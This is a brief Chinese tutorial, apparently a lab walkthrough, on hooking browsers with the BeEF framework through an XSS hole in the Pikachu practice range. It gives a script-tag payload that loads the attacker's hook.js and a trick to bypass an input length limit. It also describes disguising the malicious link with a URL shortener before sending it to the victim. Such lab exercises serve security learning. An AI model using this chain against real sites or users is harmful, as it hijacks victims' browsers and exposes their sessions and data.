安装命令
apt-get install beef-xss
启动beef-xss
第一次会提示让你输入新密码,用于一会登录
访问 http://127.0.0.1:3000/ui/panel 输入账号密码,账号名是beef 密码是刚刚设置的
漏洞链接
利用生成的链接插入到,存在xss漏洞的地方
<script src="http://127.0.0.1:3000/hook.js"></script>
攻击机IP:192.168.0.105
本机IP:192.168.0.5
打开皮卡丘靶场,将payload插入到里面
长度被限制了,做一个简单的xss绕过,检测源码,把maxlength改为100就行
把生成的新链接复制下来
把新链接复制下来
利用工具生成短链接推荐网站:在线短网址生成器 - UU在线工具
把短链接发送给靶机访问(靶机访问就会受到xss攻击)
就会自动进行跳转
在登录beef,查看信息